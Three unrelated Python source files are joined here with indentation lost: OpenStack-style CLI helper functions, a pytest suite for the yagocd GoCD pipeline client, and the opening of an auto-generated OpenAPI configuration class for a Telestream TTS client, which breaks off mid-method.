kwargs['name'] = name_or_id
except Exception:
pass
# finally try to find entity by name
try:
return manager.find(**kwargs)
# FIXME(dtroyer): The exception to catch here is dependent on which
# client library the manager passed in belongs to.
# Eventually this should be pulled from a common set
# of client exceptions.
except Exception as ex:
if type(ex).__name__ == 'NotFound':
msg = _(
"No %(resource)s with a name or ID of '%(id)s' exists."
)
raise exceptions.CommandError(msg % {
'resource': manager.resource_class.__name__.lower(),
'id': name_or_id,
})
if type(ex).__name__ == 'NoUniqueMatch':
msg = _(
"More than one %(resource)s exists with the name '%(id)s'."
)
raise exceptions.CommandError(msg % {
'resource': manager.resource_class.__name__.lower(),
'id': name_or_id,
})
if type(ex).__name__ == 'Forbidden':
msg = _(
"You are not authorized to find %(resource)s with the "
"name '%(id)s'."
)
raise exceptions.CommandError(msg % {
'resource': manager.resource_class.__name__.lower(),
'id': name_or_id,
})
else:
pass
# Case 5: For client with no find function, list all resources and hope
# to find a matching name or ID.
count = 0
for resource in manager.list():
if (resource.get('id') == name_or_id or
resource.get('name') == name_or_id):
count += 1
_resource = resource
if count == 0:
# we found no match, report back this error:
msg = _("Could not find resource %s")
raise exceptions.CommandError(msg % name_or_id)
elif count == 1:
return _resource
else:
# we found multiple matches, report back this error
msg = _("More than one resource exists with the name or ID '%s'.")
raise exceptions.CommandError(msg % name_or_id)
def format_dict(data, prefix=None):
"""Return a formatted string of key value pairs
:param data: a dict
:param prefix: the current parent keys in a recursive call
:rtype: a string formatted to key='value'
"""
if data is None:
return None
output = ""
for s in sorted(data):
if prefix:
key_str = ".".join([prefix, s])
else:
key_str = s
if isinstance(data[s], dict):
# NOTE(dtroyer): Only append the separator chars here, quoting
# is completely handled in the terminal case.
output = output + format_dict(data[s], prefix=key_str) + ", "
else:
output = output + key_str + "='" + six.text_type(data[s]) + "', "
return output[:-2]
def format_dict_of_list(data, separator='; '):
"""Return a formatted string of key value pair
:param data: a dict, key is string, value is a list of string, for example:
{u'public': [u'2001:db8::8', u'172.24.4.6']}
:param separator: the separator to use between key/value pair
(default: '; ')
:return: a string formatted to {'key1'=['value1', 'value2']} with separated
by separator
"""
if data is None:
return None
output = []
for key in sorted(data):
value = data[key]
if value is None:
continue
value_str = format_list(value)
group = "%s=%s" % (key, value_str)
output.append(group)
return separator.join(output)
def format_list(data, separator=', '):
"""Return a formatted strings
:param data: a list of strings
:param separator: the separator to use between strings (default: ', ')
:rtype: a string formatted based on separator
"""
if data is None:
return None
return separator.join(sorted(data))
def format_list_of_dicts(data):
"""Return a formatted string of key value pairs for each dict
:param data: a list of dicts
:rtype: a string formatted to key='value' with dicts separated by new line
"""
if data is None:
return None
return '\n'.join(format_dict(i) for i in data)
def format_size(size):
"""Display size of a resource in a human readable format
:param string size:
The size of the resource in bytes.
:returns:
Returns the size in human-friendly format
:rtype string:
This function converts the size (provided in bytes) of a resource
into a human-friendly format such as K, M, G, T, P, E, Z
"""
suffix = ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']
base = 1000.0
index = 0
if size is None:
size = 0
while size >= base:
index = index + 1
size = size / base
padded = '%.1f' % size
stripped = padded.rstrip('0').rstrip('.')
return '%s%s' % (stripped, suffix[index])
def get_client_class(api_name, version, version_map):
"""Returns the client class for the requested API version
:param api_name: the name of the API, e.g. 'compute', 'image', etc
:param version: the requested API version
:param version_map: a dict of client classes keyed by version
:rtype: a client class for the requested API version
"""
try:
client_path = version_map[str(version)]
except (KeyError, ValueError):
sorted_versions = sorted(version_map.keys(),
key=lambda s: list(map(int, s.split('.'))))
msg = _(
"Invalid %(api_name)s client version '%(version)s'. "
"must be one of: %(version_map)s"
)
raise exceptions.UnsupportedVersion(msg % {
'api_name': api_name,
'version': version,
'version_map': ', '.join(sorted_versions),
})
return importutils.import_class(client_path)
def get_dict_properties(item, fields, mixed_case_fields=None, formatters=None):
"""Return a tuple containing the item properties.
:param item: a single dict resource
:param fields: tuple of strings with the desired field names
:param mixed_case_fields: tuple of field names to preserve case
:param formatters: dictionary mapping field names to callables
to format the values
"""
if mixed_case_fields is None:
mixed_case_fields = []
if formatters is None:
formatters = {}
row = []
for field in fields:
if field in mixed_case_fields:
field_name = field.replace(' ', '_')
else:
field_name = field.lower().replace(' ', '_')
data = item[field_name] if field_name in item else ''
if field in formatters:
formatter = formatters[field]
if (isinstance(formatter, type) and issubclass(
formatter, cliff_columns.FormattableColumn)):
data = formatter(data)
elif callable(formatter):
warnings.warn(
'The usage of formatter functions is now discouraged. '
'Consider using cliff.columns.FormattableColumn instead. '
'See reviews linked with bug 1687955 for more detail.',
category=DeprecationWarning)
if data is not None:
data = formatter(data)
else:
msg = "Invalid formatter provided."
raise exceptions.CommandError(msg)
row.append(data)
return tuple(row)
def get_effective_log_level():
"""Returns the lowest logging level considered by logging handlers
Retrieve and return the smallest log level set among the root
logger's handlers (in case of multiple handlers).
"""
root_log = logging.getLogger()
min_log_lvl = logging.CRITICAL
for handler in root_log.handlers:
min_log_lvl = min(min_log_lvl, handler.level)
return min_log_lvl
def get_field(item, field):
try:
if isinstance(item, dict):
return item[field]
else:
return getattr(item, field)
except Exception:
msg = _("Resource doesn't have field %s")
raise exceptions.CommandError(msg % field)
def get_item_properties(item, fields, mixed_case_fields=None, formatters=None):
"""Return a tuple containing the item properties.
:param item: a single item resource (e.g. Server, Project, etc)
:param fields: tuple of strings with the desired field names
:param mixed_case_fields: tuple of field names to preserve case
:param formatters: dictionary mapping field names to callables
to format the values
"""
if mixed_case_fields is None:
mixed_case_fields = []
if formatters is None:
formatters = {}
row = []
for field in fields:
if field in mixed_case_fields:
field_name = field.replace(' ', '_')
else:
field_name = field.lower().replace(' ', '_')
data = getattr(item, field_name, '')
if field in formatters:
formatter = formatters[field]
if (isinstance(formatter, type) and issubclass(
formatter, cliff_columns.FormattableColumn)):
data = formatter(data)
elif callable(formatter):
warnings.warn(
'The usage of formatter functions is now discouraged. '
'Consider using cliff.columns.FormattableColumn instead. '
'See reviews linked with bug 1687955 for more detail.',
category=DeprecationWarning)
if data is not None:
data = formatter(data)
else:
msg = "Invalid formatter provided."
raise exceptions.CommandError(msg)
row.append(data)
return tuple(row)
def get_password(stdin, prompt=None, confirm=True):
message = prompt or "User Password:"
if hasattr(stdin, 'isatty') and stdin.isatty():
try:
while True:
first_pass = getpass.getpass(message)
if not confirm:
return first_pass
second_pass = getpass.getpass("Repeat " + message)
if first_pass == second_pass:
return first_pass
msg = _("The passwords entered were not the same")
print(msg)
except EOFError: # Ctl-D
msg = _("Error reading password")
raise exceptions.CommandError(msg)
msg = _("No terminal detected attempting to read password")
raise exceptions.CommandError(msg)
def is_ascii(string):
try:
(string.decode('ascii') if isinstance(string, bytes)
else string.encode('ascii'))
return True
except (UnicodeEncodeError, UnicodeDecodeError):
return False
def read_blob_file_contents(blob_file):
try:
with open(blob_file) as file:
blob = file.read().strip()
return blob
except IOError:
msg = _("Error occurred trying to read from file %s")
raise exceptions.CommandError(msg % blob_file)
def sort_items(items, sort_str, sort_type=None):
"""Sort items based on sort keys and sort directions given by sort_str.
:param items: a list or generator object of items
:param sort_str: a string defining the sort rules, the format is
'<key1>:[direction1],<key2>:[direction2]...', direction can be 'asc'
for ascending or 'desc' for descending, if direction is not given,
it's ascending by default
:return: sorted items
"""
if not sort_str:
return items
# items may be a generator object, transform it to a list
items = list(items)
sort_keys = sort_str.strip().split(',')
for sort_key in reversed(sort_keys):
reverse = False
if ':' in sort_key:
sort_key, direction = sort_key.split(':', 1)
if not sort_key:
msg = _("'<empty string>'' is not a valid sort key")
raise exceptions.CommandError(msg)
if direction not in ['asc', 'desc']:
if not direction:
direction = "<empty string>"
msg = _(
"'%(direction)s' is not a valid sort direction for "
"sort key %(sort_key)s, use 'asc' or 'desc' instead"
)
raise exceptions.CommandError(msg % {
'direction': direction,
'sort_key': sort_key,
})
if direction == 'desc':
reverse = True
def f(x):
# Attempts to convert items to same 'sort_type' if provided.
# This is due to Python 3 throwing TypeError if you attempt to
# compare different types
item = get_field(x, sort_key)
if sort_type and not isinstance(item, sort_type):
try:
item = sort_type(item)
except Exception:
# Can't convert, so no sensible way to compare
item = sort_type()
return item
items.sort(key=f, reverse=reverse)
return items
def wait_for_delete(manager,
res_id,
status_field='status',
error_status=['error'],
exception_name=['NotFound'],
sleep_time=5,
timeout=300,
callback=None):
"""Wait for resource deletion
:param manager: the manager from which we can get the resource
:param res_id: the resource id to watch
:param status_field: the status attribute in the returned resource object,
this is used to check for error states while the resource is being
deleted
:param error_status: a list of status strings for error
:param exception_name: a list of exception strings for deleted case
:param sleep_time: wait this long between checks (seconds)
:param timeout: check until this long (seconds)
:param callback: called per sleep cycle, useful to display progress; this
function is passed a progress value during each iteration of the wait
loop
:rtype: True on success, False if the resource has gone to error state or
the timeout has been reached
"""
total_time = 0
while total_time < timeout:
try:
# might not be a bad idea to re-use find_resource here if it was
# a bit more friendly in the exceptions it raised so we could just
# handle a NotFound exception here without parsing the message
res = manager.get(res_id)
except Exception as ex:
if type(ex).__name__ in exception_name:
return True
raise
status = getattr(res, status_field, '').lower()
if status in error_status:
return False
if callback:
progress = getattr(res, 'progress', None) or 0
callback(progress)
time.sleep(sleep_time)
total_time += sleep_time
# if we got this far we've timed out
return False
def wait_for_status(status_f,
res_id,
status_field='status',
success_status=['active'],
error_status=['error'],
sleep_time=5,
callback=None):
"""Wait for status change on a resource during a long-running operation
:param status_f: a status function that takes a single id argument
:param res_id: the resource id to watch
:param status_field: the status attribute in the returned resource object
:param success_status: a list of status strings for successful completion
:param error_status: a list of status strings for error
:param sleep_time: wait this long (seconds)
:param callback: called per sleep cycle, useful to display progress
:rtype: True on success
"""
while True:
res = status_f(res_id)
status = getattr(res, status_field, '').lower()
if status in success_status:
retval = True
break
elif status in error_status:
retval = False
break
if callback:
progress = getattr(res, 'progress', None) or 0
callback(progress)
time.sleep(sleep_time)
return retval
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# The MIT License
#
# Copyright (c) 2016 Grigory Chernyshev
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import hashlib
import time
import mock
import pytest
from six import string_types
from tests import AbstractTestManager, ConfirmHeaderMixin, RequestContentTypeHeadersMixin, ReturnValueMixin
from yagocd.exception import RequestError
from yagocd.resources import material
from yagocd.resources import pipeline
from yagocd.resources import stage
@pytest.fixture()
def manager(session_fixture):
return pipeline.PipelineManager(session=session_fixture)
class BaseTestPipelineManager(object):
@staticmethod
def get_suffix(*args):
m = hashlib.md5()
m.update('|'.join([str(x) for x in args]).encode('utf-8'))
m.hexdigest()
return m.hexdigest()[:8]
@pytest.fixture()
def mock_manager(self, mock_session):
return pipeline.PipelineManager(session=mock_session)
class TestList(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/pipeline_list") as cass:
return cass, manager.list()
@pytest.fixture()
def expected_request_url(self):
return '/go/api/config/pipeline_groups'
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return list
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
assert len(result) > 0
assert all(isinstance(i, pipeline.PipelineEntity) for i in result)
return check_value
@mock.patch('yagocd.util.YagocdUtil.build_graph')
def test_build_graph_is_called(self, mock_build_graph, manager, my_vcr):
self._execute_test_action(manager, my_vcr)
mock_build_graph.assert_called()
class TestFind(TestList):
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr, name=''):
with my_vcr.use_cassette("pipeline/pipeline_list") as cass:
return cass, manager.find(name)
@pytest.fixture()
def expected_return_type(self):
return None
@pytest.fixture()
def expected_return_value(self):
return None
@mock.patch('yagocd.resources.pipeline.PipelineManager.list')
def test_list_is_called(self, mock_list, manager):
manager.find(mock.MagicMock())
mock_list.assert_called()
def test_find_non_existing(self, manager, my_vcr):
name = 'This_Pipeline_Doesnt_Exists'
cass, result = self._execute_test_action(manager, my_vcr, name)
assert result is None
def test_find_returns_pipeline_entity(self, manager, my_vcr):
name = 'Production_Services'
cass, result = self._execute_test_action(manager, my_vcr, name)
assert isinstance(result, pipeline.PipelineEntity)
def test_find_returns_entity_with_same_name(self, manager, my_vcr):
name = 'Production_Services'
cass, result = self._execute_test_action(manager, my_vcr, name)
assert result.data.name == name
class TestHistory(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
NAME = 'Consumer_Website'
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/history_Consumer_Website") as cass:
return cass, manager.history(self.NAME)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/history/{offset}'.format(name=self.NAME, offset=0)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return list
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
assert len(result) > 0
assert all(isinstance(i, pipeline.PipelineInstance) for i in result)
assert all(i.data.name == self.NAME for i in result)
return check_value
def test_non_existing_history_raises_http_error(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/history_non_existing") as cass:
with pytest.raises(RequestError):
return cass, manager.history("pipeline_non_existing")
class TestFullHistory(BaseTestPipelineManager):
@mock.patch('yagocd.resources.pipeline.PipelineManager.history')
def test_history_is_called(self, history_mock, mock_manager):
history_mock.side_effect = [['foo', 'bar', 'baz'], []]
name = "Consumer_Website"
list(mock_manager.full_history(name))
calls = [mock.call(name, 0), mock.call(name, 3)]
history_mock.assert_has_calls(calls)
class TestLast(BaseTestPipelineManager):
@mock.patch('yagocd.resources.pipeline.PipelineManager.history')
def test_history_is_called(self, history_mock, mock_manager):
name = "Consumer_Website"
mock_manager.last(name)
history_mock.assert_called_with(name=name)
@mock.patch('yagocd.resources.pipeline.PipelineManager.history')
def test_last_return_last(self, history_mock, mock_manager):
history_mock.return_value = ['foo', 'bar', 'baz']
assert mock_manager.last(mock.MagicMock()) == 'foo'
class TestGet(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
NAME = "Consumer_Website"
COUNTER = 2
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/get_Consumer_Website") as cass:
return cass, manager.get(self.NAME, self.COUNTER)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/instance/{counter}'.format(
name=self.NAME, counter=self.COUNTER
)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return pipeline.PipelineInstance
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
assert result.data.name == self.NAME
return check_value
def test_get_non_existing(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/get_non_existing"):
with pytest.raises(RequestError):
manager.get("pipeline_instance_non_existing", 1)
class TestStatus(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
NAME = "UnPausedPipeline"
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/status_{}".format(self.NAME)) as cass:
return cass, manager.status(self.NAME)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/status'.format(name=self.NAME)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return dict
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
expected_items = {'paused': False, 'schedulable': True, 'locked': False}
for name, value in expected_items.items():
assert result[name] == value
return check_value
class TestPause(BaseTestPipelineManager, AbstractTestManager, ConfirmHeaderMixin):
NAME = 'UnPausedPipeline'
REASON = 'Test pause reason'
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/pause_{}".format(self.NAME)) as cass:
return cass, manager.pause(self.NAME, self.REASON)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/pause'.format(name=self.NAME)
@pytest.fixture()
def expected_request_method(self):
return 'POST'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
def test_pause(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/pause_{}_complex".format(self.NAME)):
manager.unpause(self.NAME)
result = manager.pause(self.NAME, self.REASON)
assert result is None
expected_items = {'paused': True, 'schedulable': False, 'locked': False}
status = manager.status(self.NAME)
for item_name, value in expected_items.items():
assert status[item_name] == value
manager.unpause(self.NAME)
class TestUnpause(BaseTestPipelineManager, AbstractTestManager, ConfirmHeaderMixin):
NAME = "PausedPipeline"
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/unpause_{}".format(self.NAME)) as cass:
return cass, manager.unpause(self.NAME)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/unpause'.format(name=self.NAME)
@pytest.fixture()
def expected_request_method(self):
return 'POST'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
def test_unpause(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/unpause_{}_complex".format(self.NAME)):
manager.pause(self.NAME, '')
result = manager.unpause(self.NAME)
assert result is None
expected_items = {'paused': False, 'schedulable': True, 'locked': False}
status = manager.status(self.NAME)
for name, value in expected_items.items():
assert status[name] == value
class TestReleaseLock(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin, ConfirmHeaderMixin):
NAME = "Deploy_UAT"
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/release_lock") as cass:
return cass, manager.release_lock(self.NAME)
@pytest.fixture()
def expected_request_url(self):
return '/go/api/pipelines/{name}/releaseLock'.format(name=self.NAME)
@pytest.fixture()
def expected_request_method(self):
return 'POST'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return string_types
@pytest.fixture()
def expected_return_value(self):
return 'pipeline lock released for {0}\n'.format(self.NAME)
@pytest.mark.parametrize("variables", [None, {'MY_VARIABLE': 'some value'}])
@pytest.mark.parametrize("secure_variables", [None, {'MY_SECRET_VARIABLE': 'secret variable'}])
class TestSchedule(
BaseTestPipelineManager,
AbstractTestManager,
RequestContentTypeHeadersMixin,
ReturnValueMixin,
ConfirmHeaderMixin
):
NAME = "TestSchedule"
@pytest.fixture()
def suffix(self, variables, secure_variables):
return self.get_suffix(variables, secure_variables)
@pytest.fixture()
def _execute_test_action(self, suffix, variables, secure_variables, manager, my_vcr):
with my_vcr.use_cassette("pipeline/schedule-{0}".format(suffix)) as cass:
return cass, manager.schedule(
name='{0}-{1}'.format(self.NAME, suffix),
variables=variables,
secure_variables=secure_variables
)
@pytest.fixture()
def expected_request_url(self, suffix, variables, secure_variables):
return '/go/api/pipelines/{name}/schedule'.format(
name='{0}-{1}'.format(self.NAME, suffix)
)
@pytest.fixture()
def expected_request_method(self):
return 'POST'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_content_type_headers(self, *args, **kwargs):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return string_types
@pytest.fixture()
def expected_return_value(self, suffix):
return 'Request to schedule pipeline {0}-{1} accepted\n'.format(self.NAME, suffix)
# Have to override and call super, as we're putting parameters to the class
# and they are applied to parent classes. As there are two classes for which
# we putting that parameters, we got an error from py.test `ValueError: duplicate 'variables'`
def test_request_url(self, _execute_test_action, expected_request_url):
return super(self.__class__, self).test_request_url(_execute_test_action, expected_request_url)
def test_request_method(self, _execute_test_action, expected_request_method):
return super(self.__class__, self).test_request_method(_execute_test_action, expected_request_method)
def test_request_accept_headers(self, _execute_test_action, expected_accept_headers):
return super(self.__class__, self).test_request_accept_headers(_execute_test_action, expected_accept_headers)
def test_response_code(self, _execute_test_action, expected_response_code):
return 202
def test_update_request_content_type_headers(self, _execute_test_action, expected_content_type_headers):
return super(self.__class__, self).test_update_request_content_type_headers(
_execute_test_action, expected_content_type_headers)
def test_return_type(self, _execute_test_action, expected_return_type):
return super(self.__class__, self).test_return_type(_execute_test_action, expected_return_type)
def test_return_value(self, _execute_test_action, expected_return_value):
return super(self.__class__, self).test_return_value(_execute_test_action, expected_return_value)
def test_confirm_header(self, _execute_test_action):
return super(self.__class__, self).test_confirm_header(_execute_test_action)
@pytest.mark.parametrize("variables", [None, {'MY_VARIABLE': 'some value'}])
@pytest.mark.parametrize("secure_variables", [None, {'MY_SECRET_VARIABLE': 'secret variable'}])
class TestScheduleWithInstance(
BaseTestPipelineManager,
AbstractTestManager,
ReturnValueMixin
):
EXPECTED_CASSETTE_COUNT = None
NAME = "TestScheduleWithInstance"
variables = [None, {'MY_VARIABLE': 'some value'}]
secure_variables = [None, {'MY_SECRET_VARIABLE': 'secret variable'}]
@pytest.fixture()
def suffix(self, variables, secure_variables):
return self.get_suffix(variables, secure_variables)
@pytest.fixture()
def pipeline_name(self, suffix):
return '{0}-{1}'.format(self.NAME, suffix)
@pytest.fixture()
def _execute_test_action(self, suffix, pipeline_name, variables, secure_variables, manager, my_vcr):
with my_vcr.use_cassette("pipeline/schedule-instance-{0}".format(suffix)) as cass:
if not len(cass.requests):
with my_vcr.use_cassette("pipeline/schedule-instance-prepare-{0}".format(suffix)):
pipeline_instance = manager.last(pipeline_name)
while pipeline_instance and not pipeline_instance.data.can_run:
print("Sleeping...") # noqa
time.sleep(10)
pipeline_instance = manager.last(pipeline_name)
backoff = 4
max_tries = 50
else:
backoff = 0
max_tries = 20
return cass, manager.schedule_with_instance(
name=pipeline_name,
variables=variables,
secure_variables=secure_variables,
backoff=backoff,
max_tries=max_tries
)
@pytest.fixture()
def expected_request_url(self, suffix, variables, secure_variables):
return '/go/api/pipelines/{name}/history/0'.format(
name='{0}-{1}'.format(self.NAME, suffix)
)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return pipeline.PipelineInstance
@pytest.fixture()
def expected_return_value(self, suffix):
pytest.skip()
# Have to override and call super, as we're putting parameters to the class
# and they are applied to parent classes. As there are two classes for which
# we putting that parameters, we got an error from py.test `ValueError: duplicate 'variables'`
def test_request_url(self, _execute_test_action, expected_request_url):
return super(self.__class__, self).test_request_url(_execute_test_action, expected_request_url)
def test_request_method(self, _execute_test_action, expected_request_method):
return super(self.__class__, self).test_request_method(_execute_test_action, expected_request_method)
def test_request_accept_headers(self, _execute_test_action, expected_accept_headers):
return super(self.__class__, self).test_request_accept_headers(_execute_test_action, expected_accept_headers)
def test_response_code(self, _execute_test_action, expected_response_code):
return super(self.__class__, self).test_response_code(_execute_test_action, expected_response_code)
def test_return_type(self, _execute_test_action, expected_return_type):
return super(self.__class__, self).test_return_type(_execute_test_action, expected_return_type)
def test_return_value(self, _execute_test_action, expected_return_value):
return super(self.__class__, self).test_return_value(_execute_test_action, expected_return_value)
class TestValueStreamMap(BaseTestPipelineManager, AbstractTestManager, ReturnValueMixin):
NAME = 'Automated_Tests'
COUNTER = 7
@pytest.fixture()
def _execute_test_action(self, manager, my_vcr):
with my_vcr.use_cassette("pipeline/value_stream_map") as cass:
return cass, manager.value_stream_map(self.NAME, self.COUNTER)
@pytest.fixture()
def expected_request_url(self):
return '/go/pipelines/value_stream_map/{name}/{counter}.json'.format(name=self.NAME, counter=self.COUNTER)
@pytest.fixture()
def expected_request_method(self):
return 'GET'
@pytest.fixture()
def expected_accept_headers(self, server_version):
return 'application/json'
@pytest.fixture()
def expected_return_type(self):
return list
@pytest.fixture()
def expected_return_value(self):
def check_value(result):
assert len(result) > 0
assert all(isinstance(i, (pipeline.PipelineInstance, material.ModificationEntity)) for i in result)
return check_value
def test_stages(self, _execute_test_action):
_, result = _execute_test_action
assert any(isinstance(i, pipeline.PipelineInstance) for i in result)
assert any(isinstance(i, material.ModificationEntity) for i in result)
for item in result:
assert hasattr(item, 'data')
if isinstance(item, pipeline.PipelineInstance):
assert all(isinstance(s, dict) for s in item.data.stages)
assert all(isinstance(s, stage.StageInstance) for s in item.stages())
elif isinstance(item, material.ModificationEntity):
hasattr(item.data, 'user')
hasattr(item.data, 'type')
hasattr(item.data, 'comment')
hasattr(item.data, 'revision')
class TestMagicMethods(object):
@mock.patch('yagocd.resources.pipeline.PipelineManager.find')
def test_indexed_based_access(self, find_mock, manager):
name = mock.MagicMock()
_ = manager[name] # noqa
find_mock.assert_called_once_with(name=name)
@mock.patch('yagocd.resources.pipeline.PipelineManager.list')
def test_iterator_access(self, list_mock, manager):
for _ in manager:
pass
list_mock.assert_called_once_with()
|
|
# coding: utf-8
"""
Tts API
Description # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import logging
import multiprocessing
import sys
import urllib3
import six
from six.moves import http_client as httplib
class Configuration(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
:param host: Base url
:param api_key: Dict to store API key(s).
Each entry in the dict specifies an API key.
The dict key is the name of the security scheme in the OAS specification.
The dict value is the API key secret.
:param api_key_prefix: Dict to store API prefix (e.g. Bearer)
The dict key is the name of the security scheme in the OAS specification.
The dict value is an API key prefix when generating the auth data.
:param username: Username for HTTP basic authentication
:param password: Password for HTTP basic authentication
:Example:
API Key Authentication Example.
Given the following security scheme in the OpenAPI specification:
components:
securitySchemes:
cookieAuth: # name for the security scheme
type: apiKey
in: cookie
name: JSESSIONID # cookie name
You can programmatically set the cookie:
conf = telestream_cloud_tts.Configuration(
api_key={'cookieAuth': 'abc123'}
api_key_prefix={'cookieAuth': 'JSESSIONID'}
)
The following cookie will be added to the HTTP request:
Cookie: JSESSIONID abc123
"""
def __init__(self, host="https://api.cloud.telestream.net/tts/v1.0",
api_key=None, api_key_prefix=None,
username=None, password=None,
):
"""Constructor
"""
self.host = host
"""Default Base url
"""
self.temp_folder_path = None
"""Temp file folder for downloading files
"""
# Authentication Settings
self.api_key = {}
if api_key:
self.api_key = api_key
"""dict to store API key(s)
"""
self.api_key_prefix = {}
if api_key_prefix:
self.api_key_prefix = api_key_prefix
"""dict to store API prefix (e.g. Bearer)
"""
self.refresh_api_key_hook = None
"""function hook to refresh API key if expired
"""
self.username = username
"""Username for HTTP basic authentication
"""
self.password = password
"""Password for HTTP basic authentication
"""
self.logger = {}
"""Logging Settings
"""
self.logger["package_logger"] = logging.getLogger("telestream_cloud_tts")
self.logger["urllib3_logger"] = logging.getLogger("urllib3")
self.logger_format = '%(asctime)s %(levelname)s %(message)s'
"""Log format
"""
self.logger_stream_handler = None
"""Log stream handler
"""
self.logger_file_handler = None
"""Log file handler
"""
self.logger_file = None
"""Debug file location
"""
self.debug = False
"""Debug switch
"""
self.verify_ssl = True
"""SSL/TLS verification
Set this to false to skip verifying SSL certificate when calling API
from https server.
"""
self.ssl_ca_cert = None
"""Set this to customize the certificate file to verify the peer.
"""
self.cert_file = None
"""client certificate file
"""
self.key_file = None
"""client key file
"""
self.assert_hostname = None
"""Set this to True/False to enable/disable SSL hostname verification.
"""
self.connection_pool_maxsize = multiprocessing.cpu_count() * 5
"""urllib3 connection pool's maximum number of connections saved
per pool. urllib3 uses 1 connection as default value, but this is
not the best value when you are making a lot of possibly parallel
requests to the same host, which is often the case here.
cpu_count * 5 is used as default value to increase performance.
"""
self.proxy = None
"""Proxy URL
"""
self.proxy_headers = None
"""Proxy headers
"""
self.safe_chars_for_path_param = ''
"""Safe chars for path_param
"""
self.retries = None
"""Adding retries to override urllib3 default value 3
"""
# Disable client side validation
self.client_side_validation = True
@property
def logger_file(self):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
return self.__logger_file
@logger_file.setter
def logger_file(self, value):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
self.__logger_file = value
if self.__logger_file:
# If set logging file,
# then add file handler and remove stream handler.
self.logger_file_handler = logging.FileHandler(self.__logger_file)
self.logger_file_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_file_handler)
@property
def debug(self):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
return self.__debug
@debug.setter
def debug(self, value):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
self.__debug = value
if self.__debug:
# if debug status is True, turn on debug logging
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.DEBUG)
# turn on httplib debug
httplib.HTTPConnection.debuglevel = 1
else:
